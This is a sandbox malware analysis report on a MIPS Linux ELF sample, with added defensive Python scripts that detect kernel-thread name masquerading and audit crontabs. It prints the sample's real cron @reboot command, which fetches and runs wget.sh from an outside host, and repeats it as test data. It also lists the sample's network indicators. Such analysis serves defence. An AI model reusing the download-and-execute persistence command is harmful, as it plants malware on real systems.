Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-cf7h3ssbme
Target 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
SHA256 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
Tags defense_evasion discovery execution persistence privilege_escalation
score 7/10


Analysis Overview

score 7/10

SHA256 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad

Threat Level: Shows suspicious behavior

Verdict: the file 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf shows suspicious behavior (see the signatures triggered during detonation below).

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalation

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Renames itself

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Enterprise Matrix V15 tactics observed: Defense Evasion, Discovery, Execution, Persistence, Privilege Escalation

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:02

Reported

2024-10-27 02:04

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

139s

Command Line

[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

Signatures

File and Directory Permissions Modification

defense_evasion

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 81.169.136.222 | N/A | N/A

Creates/modifies Cron job

execution persistence privilege_escalation

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.XSZqxU | /usr/bin/crontab | N/A

tmp.XSZqxU is the temporary file crontab(1) writes in the spool directory before renaming it over the user's crontab; the job it installs is the @reboot line visible in the /bin/sh command under Processes.

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A

The chosen name imitates the kernel's per-CPU watchdog thread as ps displays it (bracketed, because real kernel threads have an empty cmdline), so a casual process listing blends the sample in with kernel threads.
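One way to catch this kind of masquerade on a live host, as an added example that is not part of the sandbox report: real kernel threads have an empty /proc/PID/cmdline, no /proc/PID/exe link and descend from kthreadd (PID 2), so a bracketed "[watchdog/0]" name backed by a real executable and a user-space parent is a giveaway. The ProcInfo fields, the sample process list and the rules are my own construction.

```python
"""Spot user-space processes that present a kernel-thread style name.

Added example, not part of the sandbox report. Real kernel threads
(watchdog/0, kworker/0:1, ...) are shown bracketed by ps only because
their /proc/<pid>/cmdline is empty; they have no /proc/<pid>/exe link and
descend from kthreadd (PID 2). A user process that rewrites argv[0] or
its comm to "[watchdog/0]" still has a non-empty cmdline, a resolvable
exe and a user-space parent. The sample process list below is constructed.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional

KTHREAD_NAME = re.compile(r"^\[[^\]]+\]$")


@dataclass
class ProcInfo:
    pid: int
    ppid: int
    comm: str            # /proc/<pid>/comm (the kernel truncates it to 15 bytes)
    cmdline: str         # /proc/<pid>/cmdline with NUL separators turned into spaces
    exe: Optional[str]   # readlink(/proc/<pid>/exe); None when the link does not exist


def is_masquerading(p: ProcInfo) -> bool:
    """True when a bracketed kernel-thread name is not backed by a real kernel thread."""
    if not any(KTHREAD_NAME.match(name) for name in (p.cmdline.strip(), p.comm)):
        return False
    genuine = (
        p.cmdline.strip() == ""          # kernel threads have no argv
        and p.exe is None                # and no executable image
        and (p.pid == 2 or p.ppid == 2)  # and hang off kthreadd
    )
    return not genuine


def find_masquerading(procs: List[ProcInfo]) -> List[ProcInfo]:
    return [p for p in procs if is_masquerading(p)]


def read_proc(pid: int) -> Optional[ProcInfo]:
    """Collect the fields above from a live Linux /proc (run as root so that
    /proc/<pid>/exe of other users' processes can be resolved)."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/comm") as f:
            comm = f.read().strip()
        with open(f"{base}/cmdline", "rb") as f:
            cmdline = f.read().replace(b"\0", b" ").decode("utf-8", "replace")
        ppid = 0
        with open(f"{base}/status") as f:
            for line in f:
                if line.startswith("PPid:"):
                    ppid = int(line.split()[1])
                    break
    except OSError:
        return None            # process exited or is not readable
    try:
        exe = os.readlink(f"{base}/exe")
    except FileNotFoundError:
        exe = None             # ENOENT: no executable image, i.e. a kernel thread
    except OSError:
        exe = "<unreadable>"   # EACCES without root; treat as a user-space process
    return ProcInfo(pid, ppid, comm, cmdline, exe)


def scan_live() -> List[ProcInfo]:
    procs = [read_proc(int(n)) for n in os.listdir("/proc") if n.isdigit()]
    return find_masquerading([p for p in procs if p is not None])


# Constructed sample: kthreadd, a genuine watchdog thread as /proc shows it, a
# genuine kworker as ps would print it, init, and a /tmp binary that renamed
# itself the way this sample did.
SAMPLE_PROCS = [
    ProcInfo(2, 0, "kthreadd", "", None),
    ProcInfo(12, 2, "watchdog/0", "", None),
    ProcInfo(13, 2, "[kworker/0:1]", "", None),
    ProcInfo(1, 0, "init", "/sbin/init", "/sbin/init"),
    ProcInfo(709, 1, "0d8c3289a2b21ab", "[watchdog/0]",
             "/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf"),
]

if __name__ == "__main__":
    for p in find_masquerading(SAMPLE_PROCS):
        print(f"pid {p.pid} (ppid {p.ppid}) claims {p.cmdline.strip() or p.comm!r} but exe is {p.exe}")
```

A binary that unlinks itself after starting (this sample also "renames itself") still shows up: readlink on /proc/PID/exe then returns the old path with a " (deleted)" suffix rather than failing, which is itself worth alerting on.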

Reads runtime system information

discovery

Description | Indicator | Process | Target
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/719/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/720/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/1/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/722/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/725/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/mounts | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/718/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/709/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/2/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/723/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/724/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/721/status | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A
File opened for reading | /proc/721/cmdline | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A

Processes

/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
  [/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

  /bin/sh
    [sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

    /usr/bin/crontab
      [crontab -l]

    /usr/bin/crontab
      [crontab -]

The (crontab -l ; echo "...") | crontab - idiom appends the new @reboot job to whatever crontab the user already has instead of replacing it. The job itself re-fetches wget.sh from hailcocks.ru with both wget and curl (whichever exists on the device), marks it world-writable and executable with chmod 777, and runs it on every boot.
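A crontab audit that flags this pattern, as an added example that is not part of the sandbox report: it parses crontab text (the output of crontab -l or a file from /var/spool/cron/crontabs), scores each job on signals such as fetching a URL with wget/curl, working in /tmp, chmod-ing a file executable and running at boot, and reports jobs that show more than one. The regexes, the two-signal threshold and the sample crontab are my own; the sample crontab contains the line this sample installed plus two benign jobs.

```python
"""Audit crontab text for download-and-execute persistence.

Added example, not from the sandbox report. It parses crontab contents
(as produced by `crontab -l` or read from /var/spool/cron/crontabs/<user>)
and flags entries that look like the @reboot line this sample installed:
fetch a script with wget/curl, chmod it, run it out of /tmp. The regexes,
the two-signal threshold and SAMPLE_CRONTAB are constructed for this example.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Tuple

DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
URL = re.compile(r"https?://[^\s\"';|&)]+")
WORLD_WRITABLE_DIR = re.compile(r"(?:^|\s|=|\bcd\s+)/(?:tmp|var/tmp|dev/shm)\b")
MAKE_EXEC = re.compile(r"\bchmod\s+(?:[ugoa]*\+[rw]*x\w*|[0-7]{3,4})\b")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: List[str]
    urls: List[str]


def split_entry(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a job line; None for blanks, comments and VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if s.startswith("@"):                       # @reboot, @daily, ...
        parts = s.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    first = s.split()[0]
    if "=" in first and not first[0].isdigit() and first[0] != "*":
        return None                             # MAILTO=, PATH=, SHELL=
    parts = s.split(None, 5)                    # five time fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def audit_crontab(text: str) -> List[Finding]:
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, cmd = entry
        reasons = []
        if DOWNLOADER.search(cmd) and URL.search(cmd):
            reasons.append("fetches remote content")
        if WORLD_WRITABLE_DIR.search(cmd):
            reasons.append("works in a world-writable directory")
        if MAKE_EXEC.search(cmd):
            reasons.append("makes a file executable")
        if schedule == "@reboot":
            reasons.append("runs at boot")
        # One signal alone (a curl health check, an @reboot service) is routine;
        # two or more is worth a human look.
        if len(reasons) >= 2:
            findings.append(Finding(n, schedule, cmd, reasons, URL.findall(cmd)))
    return findings


def audit_user(user: str) -> List[Finding]:
    """Run `crontab -l -u USER` (needs root) and audit its output."""
    out = subprocess.run(["crontab", "-l", "-u", user], capture_output=True, text=True)
    return audit_crontab(out.stdout) if out.returncode == 0 else []


# Constructed sample crontab: two benign jobs plus the line the sample installed.
SAMPLE_CRONTAB = """\
MAILTO=root
# nightly backup
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsS https://healthcheck.example.invalid/ping >/dev/null
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} [{f.schedule}] {', '.join(f.reasons)}: {f.command}")
        for u in f.urls:
            print("   fetches", u)
```

On a real host run audit_user for every account in /etc/passwd and also feed /etc/crontab and the files under /etc/cron.d through audit_crontab (those carry an extra user field after the five time fields, so adjust split_entry accordingly); the spool temp file named in the Files section is gone once crontab(1) finishes, so the installed crontab is what remains to inspect.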

Network

Country | Destination | Domain | Proto
DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp
CZ | 195.133.92.51:17892 | kingstonwikkerink.dyn | tcp

The sample resolved kingstonwikkerink.dyn through 81.169.136.222 rather than the sandbox's configured resolver (the "Unexpected DNS network traffic destination" signature above) and then opened a TCP connection to 195.133.92.51 on port 17892, the address the domain resolved to.

Files

/var/spool/cron/crontabs/tmp.XSZqxU

MD5 68130ff0ed9a7764cd371c8e6baa6210
SHA1 d82a9fc5bdb2d9f1cee0bd8458c1f3e94255f3d3
SHA256 3bc09503863de8ab831cfaa97b2f03120397fdaa453c39d3db16f32a0124e462
SHA512 a344d6280beb8e6a2af5740eb256947e5153210f4fb81c28db5d356cf8189e1bb9719e854a8a94b251506393cdcf2ef4e8e039b345dc0d2f951121627e9245aa